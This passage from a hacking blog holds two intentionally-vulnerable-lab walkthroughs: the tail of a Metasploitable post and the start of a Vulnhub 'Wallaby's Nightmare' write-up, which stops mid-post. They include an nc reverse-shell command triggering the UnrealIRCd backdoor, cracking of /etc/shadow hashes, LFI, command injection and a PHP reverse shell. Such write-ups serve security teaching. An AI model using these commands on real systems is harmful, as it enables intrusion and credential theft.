<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLXT3xVJm8a1zVmgZAsBMyEbp_h-Owkak_0Tx92ReyVXLGajc2SL06cwjS3tSdaCEg4FJsipbev4LTd_Gt0Wi5SXLbQeBWAdLD9SSp6_HvxH0uNsrcOzobXykK3FK3-uFKLCDtcxQu63Hb/s1600/44_shell_with_manual_unrealirc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLXT3xVJm8a1zVmgZAsBMyEbp_h-Owkak_0Tx92ReyVXLGajc2SL06cwjS3tSdaCEg4FJsipbev4LTd_Gt0Wi5SXLbQeBWAdLD9SSp6_HvxH0uNsrcOzobXykK3FK3-uFKLCDtcxQu63Hb/s320/44_shell_with_manual_unrealirc.png" width="320" /></a></div>
<br />
Awesome! We can exploit this vulnerability using nc and metasploit. I don't show the nc command used but it was "AB; nc -e /bin/bash 10.0.0.18 1234". The AB; to trigger the backdoor and -e to give us a shell on the remote host when it calls back to us, and 10.0.0.18 is my local IP Address on my LAN.<br />
<br />
As you can see, there are so many ways to practice using your tools and skills to break into this hyper-vulnerable machine. Next, we're going to show a vulnerability that is more prevalent than ANY OTHER and is probably more widely exploited than any other. It's the weak password.<br />
<br />
Let's show how easy some of these passwords can be cracked.<br />
<br />
When cracking passwords from a linux system, there are two files that need to be grabbed, the /etc/passwd file and the /etc/shadow file. We were able to get these files because of any of the previous exploits that got us root permissions. First, we need to format them for John The Ripper, our password cracker.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFRFLBJ8Il1Mc4cQpt3HxuaRXazYYWajMqUrFjYz5L8PEeTY_trnq70WQJdnzUkqpGdiCxQnQmU7i-Q-35gaVkSKKqZguy0L5_aYxn3pw3_IPtwu4ugHdw5Sqdw8nb4x3s0uiKNutRIWo3/s1600/45_etc_passwd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="813" data-original-width="1600" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFRFLBJ8Il1Mc4cQpt3HxuaRXazYYWajMqUrFjYz5L8PEeTY_trnq70WQJdnzUkqpGdiCxQnQmU7i-Q-35gaVkSKKqZguy0L5_aYxn3pw3_IPtwu4ugHdw5Sqdw8nb4x3s0uiKNutRIWo3/s320/45_etc_passwd.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Here is the /etc/passwd file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrEm8N0oLfKemDqMXogkgLcNUGe9gdIujlScup-yxrsZEDWitWEq7ohscgTu8W2BwZMqYc-3uZkgp7WVdZ01cmcDRc1XHqwGyDzhnd5zCqvYVL81CAsvery4CE1NrFpTFn8puJ2dZYWlJ1/s1600/46_etc_shadow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="813" data-original-width="1600" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhrEm8N0oLfKemDqMXogkgLcNUGe9gdIujlScup-yxrsZEDWitWEq7ohscgTu8W2BwZMqYc-3uZkgp7WVdZ01cmcDRc1XHqwGyDzhnd5zCqvYVL81CAsvery4CE1NrFpTFn8puJ2dZYWlJ1/s320/46_etc_shadow.png" width="320" /></a></div>
<br />
Here is the /etc/shadow file. We can them combine them using the unshadow tool...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjbjWLPLq9lPXtQ8PVtePQo66wS0xVVqA3360-itfS4FY_XZpMFf3rh3Iiu_uK55-ELd458KlPMMw_Lh9h_qwVi6ORXLoVOutyJwSZFPMEz4UpZHAPISN_qfWaluPAncSfy1pZ42SkCBBc/s1600/47_metasploitable_crackme.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="813" data-original-width="1600" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjbjWLPLq9lPXtQ8PVtePQo66wS0xVVqA3360-itfS4FY_XZpMFf3rh3Iiu_uK55-ELd458KlPMMw_Lh9h_qwVi6ORXLoVOutyJwSZFPMEz4UpZHAPISN_qfWaluPAncSfy1pZ42SkCBBc/s320/47_metasploitable_crackme.png" width="320" /></a></div>
<br />
The first six passwords were cracked in a few seconds and the root password required more brute forcing. I stopped it after a few million checks because if we wanted to, we could change the root password with our root permissions.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho_b49E5AZ2eK0QqDHHNWk0YC-Y9snY2KKeQG9EB2S5WjGojdA01qpIAfaMxsPIRpaFRfTBJ2FIGZ3yoWvCVcECU95zzo3MklBCpIg4QG4zABbDjS6PMs-hLSvsEJCP6DtPDLKgxGnaGFj/s1600/48_cracked_passwords.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="813" data-original-width="1600" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho_b49E5AZ2eK0QqDHHNWk0YC-Y9snY2KKeQG9EB2S5WjGojdA01qpIAfaMxsPIRpaFRfTBJ2FIGZ3yoWvCVcECU95zzo3MklBCpIg4QG4zABbDjS6PMs-hLSvsEJCP6DtPDLKgxGnaGFj/s320/48_cracked_passwords.png" width="320" /></a></div>
<br />
This is why password cracking can be so powerful. If the password is not complex, there exist lists of compromised passwords, often used passwords, common dictionary words, and hybrid words with numbers and symbols so even moderately complex passwords can be cracked because of pure brute force power.<br />
<br />
Well that's all for this post! Hack Responsibly, Hack Professionally.<br />
<br />Austinhttp://www.blogger.com/profile/01968094133955654942noreply@blogger.com1tag:blogger.com,1999:blog-918525977206186619.post-25847242409897713282017-02-25T11:20:00.000-05:002017-02-25T11:20:40.315-05:00Nightmare on Wallaby Street - Vulnhub WalkthroughHere we are again doing some friday night hacking! I haven't posted in awhile (been crazy busy) so I wanted to unwind and relax with a good vulnhub box. I decided I'd work on Wallaby's: Nightmare. Let's dive right in.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQYrukn1jSyvTQF8AfBYUiTUVWskk_QkLkFhlino5E-RXPbOaGQ48-RMUtauP3Wy3xCKI5cLJDSaQ2PkzrOiAV2-00sIaG67yahHjcywULF4ezY8tOeQ90CWzXbKenAO2-7mc4OJmzPqi6/s1600/first_webpage.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgQYrukn1jSyvTQF8AfBYUiTUVWskk_QkLkFhlino5E-RXPbOaGQ48-RMUtauP3Wy3xCKI5cLJDSaQ2PkzrOiAV2-00sIaG67yahHjcywULF4ezY8tOeQ90CWzXbKenAO2-7mc4OJmzPqi6/s320/first_webpage.png" width="320" /></a></div>
<br />
This is the first page you see on the web server. Is this part of the CTF?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjODH-E7qfD2j7mNIz1P-nVdubF6bDPjTB28h9FyWN-wfwYynbRT0PEkuZHYKesiqLiBP7WOnjGH2Kl-PSRWPX-oqMXBeZ3WeonP2y2lxCXmK5tLI9jNW724VSxEPxHOFuI4FpgLAI8FFLA/s1600/enter_username.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjODH-E7qfD2j7mNIz1P-nVdubF6bDPjTB28h9FyWN-wfwYynbRT0PEkuZHYKesiqLiBP7WOnjGH2Kl-PSRWPX-oqMXBeZ3WeonP2y2lxCXmK5tLI9jNW724VSxEPxHOFuI4FpgLAI8FFLA/s320/enter_username.png" width="320" /></a></div>
<br />
I decided to enter my name and see what happens...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYQEqbuRZCXCWfoSMQGI-ISolypDSVCRFo5xO-1sAn80Bb4BLAqqccMUsncOzYGkgw49u-U3XUHyn73VPOaWR1eglROmsaNaxJwoVf1t960Ow4iwxCVgQE5OMblr3bHnQX5OL8YbDg1_H1/s1600/starting_ctf.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhYQEqbuRZCXCWfoSMQGI-ISolypDSVCRFo5xO-1sAn80Bb4BLAqqccMUsncOzYGkgw49u-U3XUHyn73VPOaWR1eglROmsaNaxJwoVf1t960Ow4iwxCVgQE5OMblr3bHnQX5OL8YbDg1_H1/s320/starting_ctf.png" width="320" /></a></div>
<br />
Alright, well looking at the top of the page, it looks like it could have a LFI vulnerability. So, let's check...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBGfYdrJ0R0r6d0a9LolUqLmS7MXfxjGV2mIQ9r1QSG34gkn35I3MNUCh94V1rWq1zz9OewJY_uAIL53FG4HDGq_Bqw42cbNnKXcKEUR3lbv9xzQZu3dOvaftRshk2VlMb8w3IrKByqQp6/s1600/local_file_inclusion_vuln.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBGfYdrJ0R0r6d0a9LolUqLmS7MXfxjGV2mIQ9r1QSG34gkn35I3MNUCh94V1rWq1zz9OewJY_uAIL53FG4HDGq_Bqw42cbNnKXcKEUR3lbv9xzQZu3dOvaftRshk2VlMb8w3IrKByqQp6/s320/local_file_inclusion_vuln.png" width="320" /></a></div>
<br />
Yup, definitely does, we can get /etc/passwd....can we get /etc/shadow?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbmzowpTpOHXnPNH2LgKn6CY2aNpGjdSzO-V4EKNsTp8IuJgJl54X7rymEzvKgyn7Mvo_3Egg13zJo1D4pivP_OVplwFj-8GUMp0nNCJVje70iBcE80cQy0NM5A1joj3ugmFQDmkmWeP0v/s1600/got_caught.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbmzowpTpOHXnPNH2LgKn6CY2aNpGjdSzO-V4EKNsTp8IuJgJl54X7rymEzvKgyn7Mvo_3Egg13zJo1D4pivP_OVplwFj-8GUMp0nNCJVje70iBcE80cQy0NM5A1joj3ugmFQDmkmWeP0v/s320/got_caught.png" width="320" /></a></div>
<br />
DAMMIT. Ok, well...onto the next steps...Let's check the network scan again.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlxfWzHnNDgLgkW6RGVR2Rw1WTe7Cg8E7Ys0Vvk3H05CXq0FrOZRUz5b6kzRcJ-NGPyp72dwF6QpDmduLqxbCDx77JxryiSQpbLeyOq7-djN5J9J1PKa0g2pZPti0zwHJKbZTUCfrgYZzP/s1600/found_new_webserver.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhlxfWzHnNDgLgkW6RGVR2Rw1WTe7Cg8E7Ys0Vvk3H05CXq0FrOZRUz5b6kzRcJ-NGPyp72dwF6QpDmduLqxbCDx77JxryiSQpbLeyOq7-djN5J9J1PKa0g2pZPti0zwHJKbZTUCfrgYZzP/s320/found_new_webserver.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Looks like there is an open TCP port on 60080 (possibly HTTP because it ends with 80?) As you can see above based on poorly timed screenshots on my part, we found the new webserver.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlTcLqyfxA0A7RuMlqnAVsqGmMuvPTXGNM7I1Gtho_vzjz8utLIAfwwTDXs1EZJ7RZw0HtRvu0BOfFSGE19jJqBtjkXSTh1WMJa4TQKTZznMgpTWdCoHY0a0YVyHs8fyZay-xCo1YFrSYI/s1600/new_webserver.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlTcLqyfxA0A7RuMlqnAVsqGmMuvPTXGNM7I1Gtho_vzjz8utLIAfwwTDXs1EZJ7RZw0HtRvu0BOfFSGE19jJqBtjkXSTh1WMJa4TQKTZznMgpTWdCoHY0a0YVyHs8fyZay-xCo1YFrSYI/s320/new_webserver.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After running dirbuster and getting nothing, I tried using the same path as the previous webserver and look! The same LFI vulnerability still exists!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKQPZLS1msitxpHP-vk1AayqrePZyJLMxSF9-BRNb8PWHC6IWnsCGHW1D1vweLUXJeDnqXq3-MvCEXTd46bUleKkEMHantSq0HcbaC94rwSUHMZR8LPTSCDyRnZEJ6rwKWblyLpmosWWAC/s1600/another_lfi_vuln.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKQPZLS1msitxpHP-vk1AayqrePZyJLMxSF9-BRNb8PWHC6IWnsCGHW1D1vweLUXJeDnqXq3-MvCEXTd46bUleKkEMHantSq0HcbaC94rwSUHMZR8LPTSCDyRnZEJ6rwKWblyLpmosWWAC/s320/another_lfi_vuln.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
Let's poke around the system and see what we can find...lol...I got banned...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Y6TFIznDWMfc8_AE-Y9AhGwoEUTDbg11_4XpPbx_RnIIjcSs6QudzgsYSciTT1WcOxQvPb7LMkjCCdgNRLdRjoYKAM9cNOHYW2N_6DAohbzWzLVUlClNsXayi7ZQpoU6b9W9dAVC7Rjv/s1600/got_banned.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2Y6TFIznDWMfc8_AE-Y9AhGwoEUTDbg11_4XpPbx_RnIIjcSs6QudzgsYSciTT1WcOxQvPb7LMkjCCdgNRLdRjoYKAM9cNOHYW2N_6DAohbzWzLVUlClNsXayi7ZQpoU6b9W9dAVC7Rjv/s320/got_banned.png" width="320" /></a></div>
<br />
<br />
So, now it's time to brute force this page parameter. I decided to use dirb and the syntax was super nice. The command I ran was: "dirb http://192.168.6.140:60080/?page= /usr/share/dirb/wordlists/big.txt" (no quotes). It returned the following pages.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXuagw9QZQTFUqoA7IJ3UwvWdLfdPp5pBOj8VyL_LPsxTV-Rs6pedB61WXIxJluSCl6m0whGGppHrXgXcbT7LMDr3YtcThm2yI-cHywqfpgBQRZjxcQXZUvvXZ0yZ-oM-OygDTVQwl-GDP/s1600/dirb_finds_param.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXuagw9QZQTFUqoA7IJ3UwvWdLfdPp5pBOj8VyL_LPsxTV-Rs6pedB61WXIxJluSCl6m0whGGppHrXgXcbT7LMDr3YtcThm2yI-cHywqfpgBQRZjxcQXZUvvXZ0yZ-oM-OygDTVQwl-GDP/s320/dirb_finds_param.png" width="320" /></a></div>
<br />
And now we check them out! The contact page gives us a fake email address, the home and index page is the same home page, cgi-bin/ didn't work, and blacklist is the banned page I showed you earlier. The mailer page seems to hold some valuable information thought (in the comments).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipwsO2mQTIoVSN3SnpNJPJ7qZyAg8rESASXc9Ttbj5xmTIOSPieB9kPRYfhCwMqfbqjo2vpA08TSzcB0f7n7JEwkTvbpKvFpljIFEf_ePZjlNBxWeY8b4DfJq_g1McXEefBeMVKgYGHDWR/s1600/found_mailer.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipwsO2mQTIoVSN3SnpNJPJ7qZyAg8rESASXc9Ttbj5xmTIOSPieB9kPRYfhCwMqfbqjo2vpA08TSzcB0f7n7JEwkTvbpKvFpljIFEf_ePZjlNBxWeY8b4DfJq_g1McXEefBeMVKgYGHDWR/s320/found_mailer.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipgAI8hcpQsit8ldb-EszHGE8WeRPnU51yYjcFfoc7qG0Ir7jtTahd9BgWp3GBrVc786BRYHjem1FnqiLKToOn-P5D1J1QupuqvYBEQftT-pDwmtY6ayFuTyu6iH76GbZU5UawARZwsOdT/s1600/mailer_source_code.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEipgAI8hcpQsit8ldb-EszHGE8WeRPnU51yYjcFfoc7qG0Ir7jtTahd9BgWp3GBrVc786BRYHjem1FnqiLKToOn-P5D1J1QupuqvYBEQftT-pDwmtY6ayFuTyu6iH76GbZU5UawARZwsOdT/s320/mailer_source_code.png" width="320" /></a></div>
<br />
Let's try these parameters in the HTML comment.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXCPNSqAyO0yPaMFQD_GRD3DuSdK9XuK4LiWpTpzdbjw7warvdxHmS7bqUpyj4j94EbhBAqJzVsApjsHN2jLhgmHhWDmGzl7PYSRBGeQ6dnkdPmHMNU13SP2cHusHaWPA9wOCN0IksHoF/s1600/mail_parameter_use1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXXCPNSqAyO0yPaMFQD_GRD3DuSdK9XuK4LiWpTpzdbjw7warvdxHmS7bqUpyj4j94EbhBAqJzVsApjsHN2jLhgmHhWDmGzl7PYSRBGeQ6dnkdPmHMNU13SP2cHusHaWPA9wOCN0IksHoF/s320/mail_parameter_use1.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuW16XMox-xiHoikWb56jtKMr719w76ezJuq_klnQcMVaudkc3iNcPeePNHtSPb_oskl5Hg5C0tek2-TKpyZyYEEKLvkWJ4_VIJDVSDBaMolLhm1HM2S3ODIrBmHdQvx-JLC5CKR7c2ixY/s1600/mail_parameter_use2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiuW16XMox-xiHoikWb56jtKMr719w76ezJuq_klnQcMVaudkc3iNcPeePNHtSPb_oskl5Hg5C0tek2-TKpyZyYEEKLvkWJ4_VIJDVSDBaMolLhm1HM2S3ODIrBmHdQvx-JLC5CKR7c2ixY/s320/mail_parameter_use2.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2_uOBpy-4yGR6WyH7mvfZIvfxbNEt5MTM8eqn6CsSJneb19f1buFNKQgisoAs5iIi6oCwCo0LcDsQB7SeYq9JOsDuvu4VHrBpk_iSe4HFZe2JlsTmjLwBzkqpEbXA0h0HVkYZHCESV_4W/s1600/command_injection.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2_uOBpy-4yGR6WyH7mvfZIvfxbNEt5MTM8eqn6CsSJneb19f1buFNKQgisoAs5iIi6oCwCo0LcDsQB7SeYq9JOsDuvu4VHrBpk_iSe4HFZe2JlsTmjLwBzkqpEbXA0h0HVkYZHCESV_4W/s320/command_injection.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Oh hello there command injection! I messed around with the mail <name> "test" input and tried LFI (not seen above) and finally tried command injection and it worked. Let's use this to get a shell on the box. Using the php reverse shell provided by pentestmonkey on kali (/usr/share/webshells/php/php-reverse-shell.php) I was able to get a limited privilege shell on the target.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPeKJSPVym06pXcTm2jj7WADBuZIOZ9XPPacKzB64gtUz3-LwIrUq_aAaolYvpx4T4qN0FNuPmgwigFXy0hLbjMmXHa4vCwqIa4-hMkT79RF_sRx1TwctEMX9xP5uuk1RiC4nMo8jQz8qZ/s1600/reverse_shell_wwwdata.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiPeKJSPVym06pXcTm2jj7WADBuZIOZ9XPPacKzB64gtUz3-LwIrUq_aAaolYvpx4T4qN0FNuPmgwigFXy0hLbjMmXHa4vCwqIa4-hMkT79RF_sRx1TwctEMX9xP5uuk1RiC4nMo8jQz8qZ/s320/reverse_shell_wwwdata.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
After a bit of research on the machine looking for privilege escalation opportunities, I found that sudo -l gave www-data opportunities to act as waldo using Iptables. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgywlGMNJx9LZdKlJ4RFHvjtpovuq3ydHV3tYyyCVu9MoZuPw534G2LVaHvE9ba62-FhBnHm99twk9I26TkDUSNNcP8RE779dET4yXk0ti0CM7b_GuXaYUJxwMcLmyyVZIVLBS9DDNv2YO_/s1600/sudo_listings.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgywlGMNJx9LZdKlJ4RFHvjtpovuq3ydHV3tYyyCVu9MoZuPw534G2LVaHvE9ba62-FhBnHm99twk9I26TkDUSNNcP8RE779dET4yXk0ti0CM7b_GuXaYUJxwMcLmyyVZIVLBS9DDNv2YO_/s320/sudo_listings.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
So, let's see what we have to play with in Iptables. It looks like there is a rule preventing us from talking to ircd and if we remember from our port scan, port 6667 was filtered. So, now that we've deleted that rule, let's try and interact with the port.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIBwRqmVs7fZLD0a1qBj01Cei4-tn_f8g56tVYE80E7vy9LnfxzL7vssvOK2PE-ptRzYLqCgSaADmOqIKeu32xPNEt5ODYHYMka-NBIO6v4WOfv1YZkLo8kmTyIGjHDTodstabrYyUp4R_/s1600/iptables_delete_rule.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIBwRqmVs7fZLD0a1qBj01Cei4-tn_f8g56tVYE80E7vy9LnfxzL7vssvOK2PE-ptRzYLqCgSaADmOqIKeu32xPNEt5ODYHYMka-NBIO6v4WOfv1YZkLo8kmTyIGjHDTodstabrYyUp4R_/s320/iptables_delete_rule.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
We know port 6667 is IRC and we found an irssi script in waldo's home directory. So I installed irssi and used it to connect to the victim system. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1fxaljlR0tW167Pa5OrVBxldCwTdJGwiSjz53yYJAQsdWDfcStJt_9YvJwTlTyVrhfjtiF_f9YcjdA6vNYERyIUeXAZ_DYjGTWYEMqqgFtNCOKfGxNWMmZ2F-wbJJwN2Lk_2qwnElL-2R/s1600/found_irssi.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1fxaljlR0tW167Pa5OrVBxldCwTdJGwiSjz53yYJAQsdWDfcStJt_9YvJwTlTyVrhfjtiF_f9YcjdA6vNYERyIUeXAZ_DYjGTWYEMqqgFtNCOKfGxNWMmZ2F-wbJJwN2Lk_2qwnElL-2R/s320/found_irssi.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI3008PRc_tUfbsE8ZJ7amLosBwOVv4R60X7k-E0Gv0ZegC-64-D-XFuaG5cxKNcwbefEozJzbsZJVoSRDwA85fEo9dLtxmwgN2-JjMfVUNSjEVjnyIYWE5s73I_rlHyIbjuRG9RuxZDbO/s1600/irssi_chat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjI3008PRc_tUfbsE8ZJ7amLosBwOVv4R60X7k-E0Gv0ZegC-64-D-XFuaG5cxKNcwbefEozJzbsZJVoSRDwA85fEo9dLtxmwgN2-JjMfVUNSjEVjnyIYWE5s73I_rlHyIbjuRG9RuxZDbO/s320/irssi_chat.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
So now, we're going to play around on this irc chat and see what happens. We found a '/list' command that showed there is one chat room called 'wallabyschat' and we used '/join wallabyschat' to join that chat room.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMy3nR9VJGjno0KN2YVS993U1CMT6JvQ_bZ8WUtPrOsUa5X7v4-WULxBnjSoYvY8oCK4IlmeCHq3TGgJ2lqS-equH-k7WHGrpmSKWrkmvOdNGyqcKLX27m-epDlzl3FzzVIKpALV0QFKm-/s1600/wallabyschat.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMy3nR9VJGjno0KN2YVS993U1CMT6JvQ_bZ8WUtPrOsUa5X7v4-WULxBnjSoYvY8oCK4IlmeCHq3TGgJ2lqS-equH-k7WHGrpmSKWrkmvOdNGyqcKLX27m-epDlzl3FzzVIKpALV0QFKm-/s320/wallabyschat.png" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
It looks like wallaby has a bot in here. I don't remember seeing that on the box, so I'm going to go look back there again. After doing a quick search on the internet for IRC bots and searching in wallaby's home folder, I found the answer. Sopel.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMGB5yyRuikmR6IMA8-H9SHkOWeJRsPstBeFh1VpHPqJW90G_RLM9EAKCS744Y0JWLJkhjCquysZ4pVWehDV7vM95JtwH0CPRJaohez4Ca3TzDMK3erVzEpi4gDmKaTC63beNIdw0lNP2j/s1600/irc_bot_google_search.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="156" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiMGB5yyRuikmR6IMA8-H9SHkOWeJRsPstBeFh1VpHPqJW90G_RLM9EAKCS744Y0JWLJkhjCquysZ4pVWehDV7vM95JtwH0CPRJaohez4Ca3TzDMK3erVzEpi4gDmKaTC63beNIdw0lNP2j/s320/irc_bot_google_search.png" width="320" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
